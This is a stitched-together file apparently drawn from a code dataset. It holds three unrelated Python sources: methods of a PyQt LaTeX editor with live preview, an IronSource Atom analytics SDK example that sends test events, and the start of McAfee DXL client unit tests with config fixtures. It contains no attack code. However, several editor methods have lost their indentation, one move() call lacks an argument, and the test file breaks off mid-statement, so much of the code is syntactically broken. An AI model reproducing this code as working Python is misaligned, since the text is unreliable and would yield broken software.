    Each spawn gets a random ID stored in ``self.live``; a worker that
    later sees a newer ID than its own aborts, so only the thread
    belonging to the latest keystroke actually compiles.
    """
    # Record when the last edit happened (used for the compile-time stat).
    self.last_update = time()
    # Generate and publish this worker's identity.
    live_id = randint(0, 999999999999999)
    self.live = live_id
    # Earliest moment the live preview may refresh (debounce window).
    self.live_update = time() + self.settings["live_update"]
    # Initialize the process
    self.status_bar_instance.update_status({"Task": "Multiprocessing..."})
    p = Thread(target=self.updateLive, args=[live_id])
    # Thread.setDaemon() is deprecated; assign the attribute instead.
    p.daemon = True
    p.start()
def updateLive(self, liveID):
    """
    Compile the LaTeX source and update the live preview image.

    :param liveID: An ID passed in just before the thread starts.  If the
        global live ID (``self.live``) no longer matches it, another key
        was pressed after this thread was spawned, so this thread is
        stale and terminates without compiling.

    Doesn't return data; it updates ``self.editor_compiled`` directly.
    On compile failure, lines reported by the compiler are highlighted
    with the theme's error color instead.
    """
    # Wait until it's time to update the live (debounce window), bailing
    # out as soon as a newer thread supersedes this one.
    while time() < self.live_update:
        if self.live != liveID:
            return
        sleep(self.settings["live_thread_refresh"])
    # Final staleness check before doing any real work.
    if self.live != liveID:
        return
    # From this point on this is the single, newest compile thread.
    # Update project
    self.status_bar_instance.update_status({"Task": "Saving..."})
    self.project.save(self.editor_box.toPlainText(), overwrite=True)
    # Update the status bar word/character counts
    self.status_bar_instance.update_status({
        "Words": len([item for item in self.editor_box.toPlainText().split(" ") if item.strip()]),
        "Characters": len(self.editor_box.toPlainText())
    })
    # Compile the code to an image
    self.status_bar_instance.update_status({"Task": "Compiling..."})
    page_index = 1  # TO DO (ADD SCROLL ELEMENT WHICH ALTERS THIS VALUE & MAKE THIS VALUE AN ATTRIBUTE)
    compiled_return_data = compile_to_image(
        app_pointer=self,
        path=self.project.file_name,
        quality=self.settings["live_quality"]
    )
    # If the file was successfully compiled...
    if compiled_return_data[0]:
        # Update the live image element
        self.status_bar_instance.update_status({"Task": "Updating..."})
        self.live_compile = "{path}{index}.jpg".format(path=compiled_return_data[0], index=page_index)
        pixel_map = QPixmap(self.live_compile)
        self.editor_compiled.setPixmap(pixel_map)
        self.editor_compiled.setScaledContents(True)
        # Clear any previous error coloring by rewriting the text with
        # itself, then restore the cursor position.
        self.status_bar_instance.update_status({"Task": "Clearing..."})
        # Get the cursor element and its position
        cursor_pos = self.editor_box.textCursor().position()
        # Reset the window by overwriting all text with itself
        self.editor_box.setPlainText(self.editor_box.toPlainText())
        # Set the block position again
        cursor = self.editor_box.textCursor()
        cursor.setPosition(cursor_pos)
        self.editor_box.setTextCursor(cursor)
    # Otherwise, if there was a compilation error,
    else:
        # If there is a compilation error... (otherwise, the second
        # item would be returned as false from the compileToImage function)
        if compiled_return_data[1]:
            # compiled_return_data[1] now holds the error message as a string
            # Make a formatter object which colors the background
            self.status_bar_instance.update_status({"Task": "Parsing..."})
            color_format = QTextBlockFormat()
            error_color = self.utils.hex_to_rgb(self.utils.hex_format(self.theme["Editor"]["error"]))
            color_format.setBackground(QColor(error_color[0], error_color[1], error_color[2]))
            # For each line which has an error...
            for line, message in self.utils.parse_errors(compiled_return_data[1]).items():
                # Set a cursor to the line number (0-based block index)
                cursor = QTextCursor(self.editor_box.document().findBlockByNumber(line - 1))
                # Update the background color
                cursor.setBlockFormat(color_format)
    self.status_bar_instance.update_status({
        "Compile Time": round(time() - self.last_update, 2),
        "Task": "Idling"
    })
def initUI(self):
    """Apply the window title and geometry, then display the window."""
    self.setWindowTitle(self.title)
    self.setGeometry(self.left, self.top, self.width, self.height)
    self.show()
def show_editor(self):
    """
    Launches the Editor GUI, and hides the Settings GUI.
    """
    # Update the attribute
    self.settings_opened = False
    # Hide all Settings elements first so they never overlap the editor
    self.settings_list.hide()
    self.editor_group.hide()
    self.menu_group.hide()
    self.theme_group.hide()
    # Show Editor elements
    self.menu_bar_instance.show()
    self.status_bar_instance.show()
    self.editor_box.show()
    self.editor_compiled.show()
    # Repaint elements
    self.resizeEvent()
def show_settings(self):
    """
    Launches the Settings GUI, and hides the Editor GUI.
    """
    # Update the attribute
    self.settings_opened = True
    # Hide all existing elements
    self.menu_bar_instance.hide()
    self.status_bar_instance.hide()
    self.editor_box.hide()
    self.editor_compiled.hide()
    # Reveal Settings elements
    self.settings_list.show()
    # Re-connecting on every visit would make change_settings_slide fire
    # once per prior visit; drop any previous connection first.
    try:
        self.settings_list.currentRowChanged['int'].disconnect(self.change_settings_slide)
    except TypeError:
        pass  # not connected yet
    self.settings_list.currentRowChanged['int'].connect(self.change_settings_slide)
    # Repaint elements
    self.resizeEvent()
def hide_all_settings(self):
    """Hide every Settings-slide group box."""
    for group in (self.editor_group, self.menu_group, self.theme_group):
        group.hide()
def change_settings_slide(self):
    """
    Show the Settings slide that matches the currently selected
    list row, hiding every other slide first.
    """
    row = self.settings_list.currentRow()
    self.hide_all_settings()
    if row == 0:  # Appearance slide
        self.editor_group.show()
        self.menu_group.show()
        self.theme_group.show()
def close_project(self):
    """
    Close the currently opened Project file and focus a neighbour.
    """
    # Last remaining project: restart so current.tex is recreated.
    if len(self.projects) == 1:
        self.restart_app()
        return
    # Remove the current Project; whichever element slides into this
    # index is the one that used to sit just above it.
    self.projects.pop(self.projects_index)
    if self.projects_index < len(self.projects):
        # A project above ours existed - focus it (same index now).
        self.switch_project(self.projects_index)
    else:
        # We were last in the list - focus the one below.
        self.switch_project(self.projects_index - 1)
def switch_project(self, new_project_index=0):
    """
    Changes the editor to focus on the new selected Project class.

    :param new_project_index: The index of self.projects to focus on.

    Also unloads every other project to save memory, refreshes the
    status bar, and rebuilds the whole menu bar (so the Projects menu
    reflects the current project list).
    """
    # Set the current project to the new index
    self.status_bar_instance.update_status({"Task": "Opening..."})
    self.projects_index = new_project_index
    self.project = self.projects[self.projects_index]
    # Unload all other projects to save memory
    for i in range(len(self.projects)):
        if i != self.projects_index:
            self.projects[i].unload()
    # Open it in the editor box
    self.editor_box.setPlainText(self.project.open())
    # Update the status bar to the current project
    self.status_bar_instance.update_status({"Project": self.project.name})
    # Update the menu data (Specifically, the Projects menu)
    self.status_bar_instance.update_status({"Task": "Updating menu..."})
    self.menu_bar_instance.set({
        "File": [{"name": "New", "bind": 'Ctrl+N'},
                 {"name": "Open", "bind": 'Ctrl+O', "func": self.utils.open_file},
                 {"name": "Save As", "bind": 'Ctrl+Shift+S', "func": self.utils.save_file},
                 {"name": "Close", "bind": 'Ctrl+W', "func": self.close_project},
                 {"name": "Reload", "bind": False, "func": self.restart_app},
                 {"name": "Exit", "bind": False, "func": self.exit_app}],
        "Edit": [{"name": "Insert", "bind": 'Ctrl+I'}],
        'Options': [{"name": "Settings", "bind": False},
                    {"name": "Plugins", "bind": False},
                    {"name": "Packages", "bind": False}],
        "View": [{"name": "Fit", "bind": False,
                  "func": lambda: self.update_fill("fit")},
                 {"name": "Fill", "bind": False,
                  "func": lambda: self.update_fill("fill")},
                 {"name": "Split", "bind": False,
                  "func": lambda: self.update_fill("split")}],
        "Tools": [{"name": "Copy Live", "bind": 'Ctrl+Shift+C',
                   "func": lambda: self.menu_bar_instance.copy_to_clipboard(self.live_compile)}],
        # NOTE: the x=i default binds the loop variable per item (avoids
        # the late-binding closure pitfall).
        "Projects": [{"name": self.projects[i].name, "bind": False,
                      "func": lambda state, x=i: self.switch_project(x)} for i in range(len(self.projects))],
        "Help": [{"name": "About", "bind": False, "func": lambda: self.error_instance.dialogue(
            "../resources/logo.ico",
            "About",
            "<b><i>ABUELA</i></b>",
            """<i>A Beautiful, Useful, & Elegant LaTeX Application.</i><br><br>
            Founded with love by @Xiddoc, @AvivHavivyan, & @RootAtKali.<br><br>
            Links:<br>
            &bull; <a href="{base_url}">Github Repo</a><br>
            &bull; <a href="{base_url}/blob/master/README.md">Documentation</a><br>
            &bull; <a href="{base_url}/blob/master/LICENSE">License</a>""".format(
                base_url=self.updater_instance.get_url()
            ))},
                 {"name": "Settings", "bind": False, "func": self.show_settings},
                 {"name": "Reset Settings", "bind": False, "func": self.utils.reset_system},
                 {"name": 'Check for Updates', "bind": False}]
    })
    self.status_bar_instance.update_status({"Task": "Idling"})
def make_spinbox(self, min_spin=0, max_spin=0, step=1, xPos=0, yPos=0, width=0, height=0, parent=False):
"""
A method to create a list of items, one of which can be selected at a time.
:param step: The step / change that the box will spin by.
:param max_spin: The maximum value the box can spin to.
:param min_spin: The minimum value the box can spin to.
:param parent: The parent widget that the element should be placed into.
:param xPos: The left-top x position of the element.
:param yPos: The left-top y position of the element.
:param width: The width of the element.
:param height: The height of the element.
:return: Returns the created element.
"""
# If there is a parent element, then set it to it
if parent:
spin_widget = QSpinBox(parent)
# Otherwise, parent the list widget to the main window
else:
spin_widget = QSpinBox(self)
# Set the stylesheet
spin_widget.setStyleSheet(self.formatStyle())
# Move the element
spin_widget.move(xPos, yPos)
# Resize it
spin_widget.resize(width, height)
# Update element data
spin_widget.setMinimum(min_spin)
spin_widget.setMaximum(max_spin)
spin_widget.setSingleStep(step)
# Return the element
return spin_widget
def make_text(self, text: str, xPos=0, yPos=0, width=0, height=0, parent=False) -> QLabel:
"""
A function to create a new multi line edit box.
:param text: The text that should be displayed in the text label.
:param parent: The parent widget that the element should be placed into.
:param xPos: The left-top x position of the box.
:param yPos: The left-top y position of the box.
:param width: The width of the box.
:param height: The height of the box.
:return: Returns the created element.
"""
# If there is a parent element, then set it to it
if parent:
text_label = QLabel(parent)
# Otherwise, parent the list widget to the main window
else:
text_label = QLabel(self)
text_label.setText(text)
text_label.setStyleSheet(self.formatStyle())
text_label.move(xPos, yPos)
text_label.resize(width, height)
return text_label
def make_list(self, items: list, xPos=0, yPos=0, width=0, height=0, parent=False):
"""
A method to create a list of items, one of which can be selected at a time.
:param parent: The parent widget that the element should be placed into.
:param items: A list of the names of the items.
:param xPos: The left-top x position of the element.
:param yPos: The left-top y position of the element.
:param width: The width of the element.
:param height: The height of the element.
:return: Returns the created element.
"""
# If there is a parent element, then set it to it
if parent:
list_widget = QListWidget(parent)
# Otherwise, parent the list widget to the main window
else:
list_widget = QListWidget(self)
# Set the stylesheet
list_widget.setStyleSheet(self.formatStyle())
# Move the element
list_widget.move(xPos, yPos)
# Resize it
list_widget.resize(width, height)
# For each item in the items list
for item in items:
# Create an item widget for it and add it to the list widget
current_item = QListWidgetItem()
current_item.setText(item)
list_widget.addItem(current_item)
# Return the element
return list_widget
def make_text_box(self, xPos=0, yPos=0, width=0, height=0):
"""
A function to create a new multi line edit box.
:param xPos: The left-top x position of the box.
:param yPos: The left-top y position of the box.
:param width: The width of the box.
:param height: The height of the box.
:return: Returns the created element.
"""
text_box = QPlainTextEdit(self)
text_box.setStyleSheet(self.formatStyle())
text_box.move(xPos, yPos)
text_box.resize(width, height)
return text_box
def make_pic(self, file_name: str = False, background: str = False, x_pos=0, y_pos=0, width=0, height=0):
"""
A function to create a new picture element.
:param background: The default background color of the picture element. Defaults to no background.
:param file_name: The path to the file to display.
:param x_pos: The left-top x position of the box.
:param y_pos: The left-top y position of the box.
:param width: The width of the box.
:param height: The height of the box.
:return: Returns the created element.
"""
label = QLabel(self)
if file_name:
pixel_map = QPixmap(file_name)
label.setPixmap(pixel_map)
if background:
label.setStyleSheet(
"background-color: {bgColor};".format(
bgColor=self.utils.hex_format(background)
)
)
label.setScaledContents(True)
label.move(x_pos, y_pos)
label.resize(width, height)
return label
def formatStyle(self):
"""
A function that takes the currently loaded theme and formats it into QtCSS.
Returns the QtCSS as a string.
"""
# Initialize the string
formatted_string = str()
# For each element in the GUI data
for element, data in self.theme["GUI"].items():
# Split the identifiers
split_element = element.split("-")
# Add the base element
formatted_string += split_element[0]
# If there is a selector (e.g., item)
if len(split_element) > 1:
formatted_string += "::{selector}".format(
selector=split_element[1]
)
# If there is a case selector (e.g., selected)
if len(split_element) > 2:
formatted_string += ":{case_selector}".format(
case_selector=split_element[2]
)
# Start the element's data segment
formatted_string += " {\n"
# Loop over each attribute
for attrib, value in data.items():
# Format the attribute and its data
formatted_string += "\t{attrib}: {value};\n".format(
attrib=attrib,
# If the value is a hex code, then update
# it to the conventional hex code
value=self.utils.hex_format(value)
)
# End the element's data segment
formatted_string += "}\n\n"
return formatted_string
def update_fill(self, new_fill_type):
"""
Updates the fill type of the screen, used in the menu bar.
:param new_fill_type: The new fill type to update to.
"""
self.settings["live_fill"] = new_fill_type
self.resizeEvent()
    def resizeEvent(self, event=None):
        """
        Resize and move all elements to their new places, and calculate
        their positions based on the new resolution of the GUI window.

        :param event: Qt resize event; unused, so the method can also be
            invoked manually with no argument (e.g. from update_fill).
        """
        # There's gotta be a better way to go about resizing the elements... CSS, maybe?
        # Update window size variables
        self.width = self.frameGeometry().width()
        self.height = self.frameGeometry().height()
        # Only update relevant elements to improve efficiency
        # Settings elements
        if self.settings_opened:
            # Calculate margin values (scaled from a 600px-wide reference design)
            margin_w = int(self.width * 10 / 600)
            # Settings list sidebar occupies the left 30% of the window
            self.settings_list.move(
                0,
                0
            )
            self.settings_list.resize(
                int(
                    self.width * 0.3
                ),
                self.height
            )
            # Appearance settings elements
            self.theme_group.move(
                int(
                    self.width * 0.3 + margin_w
                ),
                int(
                    self.height * 10 / 600
                )
            )
            self.theme_group.resize(
                int(
                    self.width * 0.7 - margin_w * 2
                ),
                int(
                    self.height * 110 / 600
                )
            )
            self.menu_group.move(
                int(
                    self.width * 0.3 + margin_w
                ),
                int(
                    self.height * 130 / 600
                )
            )
            self.menu_group.resize(
                int(
                    self.width * 0.7 - margin_w * 2
                ),
                int(
                    self.height * 270 / 600
                )
            )
            self.editor_group.move(
                int(
                    self.width * 0.3 + margin_w
                ),
                int(
                    self.height * 410 / 600
                )
            )
            self.editor_group.resize(
                int(
                    self.width * 0.7 - margin_w * 2
                ),
                int(
                    self.height * 150 / 600
                )
            )
            # Grouped elements
            # NOTE(review): only one coordinate is passed here (note the
            # trailing comma) -- QWidget.move() needs both x and y, so the
            # y argument appears to have been lost; confirm the intended
            # value before relying on the settings layout.
            self.theme_select_element.move(
                int(
                    self.width * 0.3 + margin_w
                ),
            )
            #
            # # Create the font selection elements
            # self.font_select_element = self.make_list(
            #     items=font_list,
            #     parent=self.editor_group
            # )
            #
            # self.menu_font_select_element = self.make_list(
            #     items=font_list,
            #     parent=self.editor_group
            # )
            #
            # # Create the spinbox elements
            # self.font_size_element = self.make_spinbox(
            #     min_spin=8,
            #     max_spin=22,
            #     step=2,
            #     parent=self.editor_group
            # )
            #
            # self.cursor_size_element = self.make_spinbox(
            #     min_spin=1,
            #     max_spin=10,
            #     parent=self.editor_group
            # )
            #
            # # Create the text elements
            # self.font_size_label_element = self.make_text(
            #     text="Font Size",
            #     parent=self.editor_group
            # )
            #
            # self.cursor_size_label_element = self.make_text(
            #     text="Cursor Size",
            #     parent=self.editor_group
            # )
            #
            # self.editor_font_element = self.make_text(
            #     text="Editor Font",
            #     parent=self.editor_group
            # )
            #
            # # Create the spinbox elements
            # self.menu_bar_size_select_element = self.make_spinbox(
            #     min_spin=6,
            #     max_spin=14,
            #     parent=self.menu_group
            # )
            #
            # self.status_bar_size_select_element = self.make_spinbox(
            #     min_spin=6,
            #     max_spin=14,
            #     parent=self.menu_group
            # )
            #
            # self.status_bar_margin_select_element = self.make_spinbox(
            #     min_spin=1,
            #     max_spin=20,
            #     parent=self.menu_group
            # )
            #
            # self.status_bar_spacing_select_element = self.make_spinbox(
            #     min_spin=1,
            #     max_spin=10,
            #     parent=self.menu_group
            # )
            #
            # # Create the text elements
            # self.menu_bar_size_element = self.make_text(
            #     text="Menu Bar Size",
            #     parent=self.menu_group
            # )
            #
            # self.status_bar_size_element = self.make_text(
            #     text="Status Bar Size",
            #     parent=self.menu_group
            # )
            #
            # self.menu_font_element = self.make_text(
            #     text="Menu Font",
            #     parent=self.menu_group
            # )
            #
            # self.status_bar_margin_element = self.make_text(
            #     text="Status Bar Margin",
            #     parent=self.menu_group
            # )
            #
            # self.status_bar_spacing_element = self.make_text(
            #     text="Status Bar Spacing",
            #     parent=self.menu_group
            # )
        # Editor elements
        else:
            # Update each element based on the live_fill setting.
            # NOTE(review): the height expressions below evaluate to floats
            # (2.5 * ...); recent PyQt releases require int arguments to
            # resize()/move() -- confirm this runs on the targeted PyQt
            # version.
            if self.utils.stringify(self.settings["live_fill"]) in ["fill", "stretch"]:
                # Fill/stretch: editor and preview each take half the width
                # Move the edit box
                self.editor_box.move(
                    0,
                    self.menu_bar_element.height()
                )
                # Resize the edit box
                self.editor_box.resize(
                    int(self.width / 2),
                    self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
                )
                # Move the live-render
                self.editor_compiled.move(
                    int(self.width / 2),
                    self.menu_bar_element.height()
                )
                # Resize the live-render
                self.editor_compiled.resize(
                    int(self.width / 2),
                    self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
                )
            elif self.utils.stringify(self.settings["live_fill"]) in ["split", "center"]:
                # Split/center: preview keeps a 1:sqrt(2) page aspect ratio,
                # centered in the right half
                # Move the edit box
                self.editor_box.move(
                    0,
                    self.menu_bar_element.height()
                )
                # Resize the edit box
                self.editor_box.resize(
                    int(self.width / 2),
                    self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
                )
                # Move the live-render
                self.editor_compiled.move(
                    int(
                        (self.width / 2) +
                        (((self.width / 2) -
                          (self.height - self.menu_bar_element.height() -
                           2.5 * self.status_bar_element.height()) / (2 ** 0.5)) / 2)
                    ),
                    self.menu_bar_element.height()
                )
                # Resize the live-render
                self.editor_compiled.resize(
                    int((
                        self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
                    ) / (
                        2 ** 0.5
                    )),
                    self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
                )
            else:
                # Default ("fit"): preview keeps the page aspect ratio flush
                # right; the editor takes the remaining width
                # Move the edit box
                self.editor_box.move(
                    0,
                    self.menu_bar_element.height()
                )
                # Resize the edit box
                self.editor_box.resize(
                    int(
                        self.width -
                        (
                            self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
                        ) / (
                            2 ** 0.5
                        )
                    ),
                    self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
                )
                # Move the live-render
                self.editor_compiled.move(
                    int(
                        self.width - (
                            self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
                        ) / (
                            2 ** 0.5
                        )
                    ),
                    self.menu_bar_element.height())
                # Resize the live-render
                self.editor_compiled.resize(
                    int(
                        (
                            self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
                        ) / (
                            2 ** 0.5
                        )
                    ),
                    self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
                )
def set_tab_order(self, *tab_order):
"""
A method to set the order of how pressing the
'TAB' key affects the selected elements.
:param tab_order: A list of the elements, the list order is the order that the tab key will pass by.
"""
# For each index in the tab list (starting from the index 1)
for i in range(1, len(tab_order)):
# Connect the previous tab to the current tab
self.setTabOrder(tab_order[i - 1], tab_order[i])
    def restart_app(self):
        """
        Restarts the application.

        This only terminates the Qt event loop, exiting with the dedicated
        restart code; the termination code is synchronized with main.py so
        that the application is reopened after termination.
        """
        QCoreApplication.exit(self.restart_code)
    @staticmethod
    def exit_app():
        """
        Exits the application with no restart.

        Terminates the Qt event loop with the default exit code (not the
        restart code), so the launcher does not relaunch the app.
        """
        QCoreApplication.exit()
|
example.py | # -*- coding: utf-8 -*-
import json
import random
from ironsource.atom.ironsource_atom import IronSourceAtom
from ironsource.atom.ironsource_atom_tracker import IronSourceAtomTracker
import time
from threading import Thread
from threading import Lock
if __name__ == "__main__":
    # Target stream and API key -- placeholders to be filled in by the user
    stream = "YOUR_TARGET.public.atom_demo_events"
    auth_key = "YOUR_KEY"
    # Low-level Atom API client pointed at the production endpoint
    api_ = IronSourceAtom(is_debug=False, endpoint="https://track.atom-data.io/")
    # put_event() GET example
    print ("==== GET REQUEST TO ATOM WITH JSON DUMPS ====")
    data_get = {"id": 1337, "event_name": "PYTHON_SDK_GET_EXAMPLE_STRING", "string_value": str(random.random())}
    response_get = api_.put_event(stream=stream, data=json.dumps(data_get), method="get", auth_key=auth_key)
    print ("GET Response data: " + str(response_get.data) + "; error: " + str(response_get.error) +
           "; status: " + str(response_get.status))
    # Same request, but letting the SDK serialize the dict itself
    print ("\n==== GET REQUEST TO ATOM WITH DICT ====")
    data_get = {"id": 1338, "event_name": "PYTHON_SDK_GET_EXAMPLE_DICT", "string_value": str(random.random())}
    response_get = api_.put_event(stream=stream, data=data_get, method="get", auth_key=auth_key)
    print ("GET Response data: " + str(response_get.data) + "; error: " + str(response_get.error) +
           "; status: " + str(response_get.status))
    # put_event() POST example (POST is the default method)
    print ("\n==== POST REQUEST TO ATOM WITH JSON DUMPS ====")
    data_post = {"id": 1339, "event_name": "PYTHON_SDK_POST_EXAMPLE_STRING", "string_value": str(random.random())}
    response_post = api_.put_event(stream=stream, data=json.dumps(data_post), auth_key=auth_key)
    print ("POST Response data: " + str(response_post.data) + "; error: " + str(response_post.error) +
           "; status: " + str(response_post.status))
    print ("\n==== POST REQUEST TO ATOM WITH DICT ====")
    data_post = {"id": 1440, "event_name": "PYTHON_SDK_POST_EXAMPLE_DICT", "string_value": str(random.random())}
    response_post = api_.put_event(stream=stream, data=data_post, auth_key=auth_key)
    print ("POST Response data: " + str(response_post.data) + "; error: " + str(response_post.error) +
           "; status: " + str(response_post.status))
    # put_events example -- sends a list of events in one batch request
    print ("\n==== BATCH POST REQUEST TO ATOM ====")
    data_post = [{"id": 1441, "event_name": "PYTHON_SDK_BATCH_POST_EXAMPLE", "string_value": str(random.random())},
                 {"id": 1442, "event_name": "PYTHON_SDK_BATCH_POST_EXAMPLE", "string_value": str(random.random())}]
    response_post = api_.put_events(stream=stream, data=data_post, auth_key=auth_key)
    print ("POST Response data: " + str(response_post.data) + "; error: " + str(response_post.error) +
           "; status: " + str(response_post.status))
    # Tracker example
    print ("\n==== TESTING ATOM TRACKER ====")

    def callback_func(timestmap, status, msg, data, stream):
        # Tracker callback function example.
        # NOTE(review): "timestmap" is a typo for "timestamp"; harmless as
        # long as the tracker invokes the callback positionally -- confirm.
        print("[EXAMPLE CALLBACK FUNCTION] timestamp: {}, status: {} message: {}".format(timestmap, status, msg))
    # endpoint = "http://127.0.0.1:3000/"
    endpoint = "http://track.atom-data.io/"
    # High-level tracker: buffers events and flushes on interval / count / size
    api_tracker = IronSourceAtomTracker(flush_interval=10000,
                                        callback=callback_func,
                                        batch_bytes_size=64 * 1024,
                                        batch_size=64,
                                        is_debug=True,
                                        debug_to_file=True,
                                        debug_file_path="./",
                                        endpoint=endpoint)

    class ThreadClass:
        # One shared counter across all worker threads, guarded by a lock.
        def __init__(self):
            self._call_index = 0
            self._thread_lock = Lock()

        def thread_worker(self, args):
            # Worker loop: track events until the shared counter reaches 100.
            print("[EXAMPLE] Thread {} started".format(args))
            while True:
                with self._thread_lock:
                    self._call_index += 1
                    data_track = {"id": self._call_index, "event_name": "PYTHON_SDK_TRACKER_EXAMPLE",
                                  "string_value": str(random.random()),
                                  "non_ascii": "Lista de leitura, novos recursos de privacidade e segurança, "
                                               "além de mais velocidade Esses são os atrativos do novo Safari"}
                    # exit after 100
                    if self._call_index >= 100:
                        return
                    else:
                        # Track every 10th event with delay
                        if self._call_index % 10 == 0:
                            time.sleep(1)
                        print("[EXAMPLE] Tracking Data")
                        api_tracker.track(stream=stream, data=data_track, auth_key=auth_key)

    # Spin up 10 worker threads that all share one ThreadClass instance
    threads_array = []
    thread_instance = ThreadClass()
    for index in range(0, 10):
        thread_index = index
        thread = Thread(target=thread_instance.thread_worker, args=[thread_index])
        threads_array.append(thread)
    for thread in threads_array:
        thread.start()
    for thread in threads_array:
        thread.join()
    print ("Finished all example methods.")
    # Keep the process alive so the tracker's background flush can drain
    time.sleep(1000000)
|
test_dxlclient.py | # -*- coding: utf-8 -*-
################################################################################
# Copyright (c) 2018 McAfee LLC - All Rights Reserved.
################################################################################
"""
Test cases for the DxlClient class
"""
# Run with python -m unittest dxlclient.test.test_dxlclient
from __future__ import absolute_import
import io
from textwrap import dedent
import time
import threading
import unittest
# pylint: disable=wrong-import-position
import paho.mqtt.client as mqtt
from nose.plugins.attrib import attr
from parameterized import parameterized
from mock import Mock, patch
import dxlclient._global_settings
from dxlclient import Request
from dxlclient import Response
from dxlclient import Event
from dxlclient import ErrorResponse
from dxlclient import DxlClient
from dxlclient import DxlClientConfig
from dxlclient import Broker
from dxlclient import UuidGenerator
from dxlclient import EventCallback
from dxlclient import RequestCallback
from dxlclient import ResponseCallback
from dxlclient import DxlException, WaitTimeoutException
# pylint: disable=wildcard-import, unused-wildcard-import
from dxlclient._global_settings import *
from .base_test import BaseClientTest, builtins
# pylint: disable=missing-docstring
# Config-file fixtures for the DxlClientConfig.create_dxl_config_from_file
# tests below; each deliberately omits one required section or option.

# Certificate options present, but under a wrong section name instead of [Certs]
CONFIG_DATA_NO_CERTS_SECTION = """
[no_certs]
BrokerCertChain=certchain.pem
CertFile=certfile.pem
PrivateKey=privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
# [Certs] section missing the BrokerCertChain option
CONFIG_DATA_NO_CA_OPTION = """
[Certs]
CertFile=certfile.pem
PrivateKey=privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
# [Certs] section missing the CertFile option
CONFIG_DATA_NO_CERT_OPTION = """
[Certs]
BrokerCertChain=certchain.pem
PrivateKey=privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
# [Certs] section missing the PrivateKey option
CONFIG_DATA_NO_PK_OPTION = """
[Certs]
BrokerCertChain=certchain.pem
CertFile=certfile.pem
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
# Broker entry present but the [Brokers] section header is missing
CONFIG_DATA_NO_BROKERS_SECTION = """
[Certs]
BrokerCertChain=certchain.pem
CertFile=certfile.pem
PrivateKey=privatekey.pk
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
# [Brokers] section present but contains no broker entries
CONFIG_DATA_NO_BROKERS_OPTION = """
[Certs]
BrokerCertChain=certchain.pem
CertFile=certfile.pem
PrivateKey=privatekey.pk
[Brokers]
"""
class DxlClientConfigTest(unittest.TestCase):
    """Unit tests for DxlClientConfig construction, file parsing and writing."""

    @parameterized.expand([
        (None,),
        ("",)
    ])
    def test_config_throws_value_error_for_empty_ca_bundle(self, ca_bundle):
        # A missing/empty CA bundle must be rejected at construction time
        self.assertRaises(ValueError, DxlClientConfig, broker_ca_bundle=ca_bundle,
                          cert_file=get_cert_file_pem(), private_key=get_dxl_private_key(), brokers=[])

    @parameterized.expand([
        (None,),
        ("",)
    ])
    def test_config_throws_value_error_for_empty_cert_file(self, cert_file):
        # A missing/empty client certificate must be rejected at construction time
        self.assertRaises(ValueError, DxlClientConfig,
                          cert_file=cert_file, broker_ca_bundle=get_ca_bundle_pem(), private_key=get_dxl_private_key(),
                          brokers=[])

    def test_get_fastest_broker_gets_the_fastest(self):
        # The semaphore makes the "slow" broker wait until the "fast" one
        # has connected, then adds an extra delay on top.
        semaphore = threading.Semaphore(0)
        # Mock brokers connect speed
        fast_broker = Mock()
        slow_broker = Mock()

        def connect_to_broker_slow():
            semaphore.acquire()
            time.sleep(0.1)

        def connect_to_broker_fast():
            semaphore.release()
        slow_broker._connect_to_broker = connect_to_broker_slow
        fast_broker._connect_to_broker = connect_to_broker_fast
        # Create config and add brokers
        config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
                                 cert_file=get_cert_file_pem(),
                                 private_key=get_dxl_private_key(),
                                 brokers=[])
        config.brokers.append(fast_broker)
        config.brokers.append(slow_broker)
        # Check that the returned is the fastest
        self.assertEqual(config._get_fastest_broker(), fast_broker)

    def test_get_sorted_broker_list_returns_empty_when_no_brokers(self):
        config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
                                 cert_file=get_cert_file_pem(),
                                 private_key=get_dxl_private_key(),
                                 brokers=[])
        self.assertEqual(config._get_sorted_broker_list(), [])

    def test_get_sorted_broker_list_returns_all_brokers(self):
        # Create config
        config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
                                 cert_file=get_cert_file_pem(),
                                 private_key=get_dxl_private_key(),
                                 brokers=[])
        # Create mocked brokers (both "connect" instantly)
        broker1 = Broker('b1host')
        broker2 = Broker('b2host')
        broker1._connect_to_broker = broker2._connect_to_broker = Mock(
            return_value=True)
        # Add them to config
        config.brokers.append(broker1)
        config.brokers.append(broker2)
        # Get all brokers
        broker_list = config._get_sorted_broker_list()
        # Check all brokers are in the list
        self.assertTrue(broker1 in broker_list)
        self.assertTrue(broker2 in broker_list)

    def test_set_config_from_file_generates_dxl_config(self):
        # Well-formed config: all three cert options plus one broker entry
        read_data = """
[Certs]
BrokerCertChain=certchain.pem
CertFile=certfile.pem
PrivateKey=privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
        # Patch open() to serve the fixture and isfile() so the path check passes
        with patch.object(builtins, 'open',
                          return_value=io.BytesIO(
